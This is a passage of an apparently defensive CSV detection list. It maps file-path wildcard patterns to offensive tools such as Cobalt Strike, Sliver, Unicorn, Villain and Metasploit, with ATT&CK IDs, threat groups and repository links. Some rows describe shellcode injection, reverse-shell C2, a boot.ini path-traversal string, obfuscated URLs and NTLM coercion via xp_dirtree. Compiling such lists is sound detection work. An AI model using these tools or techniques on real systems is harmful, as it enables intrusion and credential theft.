APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.torproject.org/*/download/tor/*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt shellcode hta*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.txt shellcode macro*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.txt shellcode ms*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.txt.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - 
T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.unconstrained.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.videos.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.villain_core*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*.vpn.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.webmail.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.wiki.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.win10.config.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*.win7.config.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*.xls.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A 
-*.xls.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xp_dirtree *\*,offensive_tool_keyword,AD exploitation cheat sheet,If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/#kali-installer-images*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/*_priv_esc.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/*SandboxEscapes/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/../../../../../boot.ini*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/.aggressor.prop*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/.cme/cme.conf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/.exegol/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/.local/share/pacu/*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/.manspider/logs*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/.manspider/loot*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/.msf4/*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/.ntdissector*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*/.sliver/logs*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/.ssh/RAI.pub*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*//:ptth*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed http://,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*//:sptth*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed https://,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*//crack.sh/get-cracking/*,offensive_tool_keyword,crack.sh,crack.sh THE WORLD???S FASTEST DES CRACKER. Used by attackers to submit passwords to crack,T1110.002 - T1021.002,TA0006 - TA0008,N/A,N/A,Credential Access,https://crack.sh/get-cracking/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*//Lh0St/InJ3C*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*//localhost:1337*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*//RRh0St/InJ3C*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*//shuck.sh*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*//StaticSyscallsDump/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/0d1n.c*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/0d1n_view*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,,
